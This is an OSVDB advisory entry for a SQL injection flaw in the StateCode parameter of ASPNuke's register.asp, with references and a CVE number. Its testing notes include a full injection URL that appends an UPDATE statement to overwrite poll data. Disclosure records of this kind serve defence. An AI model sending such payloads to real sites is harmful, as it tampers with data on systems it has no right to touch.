ASPNuke register.asp StateCode Variable SQL Injection

2006-11-19T02:09:37
ID OSVDB:31918
Type osvdb
Reporter OSVDB
Modified 2006-11-19T02:09:37

Description

Manual Testing Notes

/module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register

References:

Vendor URL: http://www.aspnuke.com/ Security Tracker: 1017255 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0374.html ISS X-Force ID: 30397 Generic Exploit URL: http://www.milw0rm.com/exploits/2813 CVE-2006-6070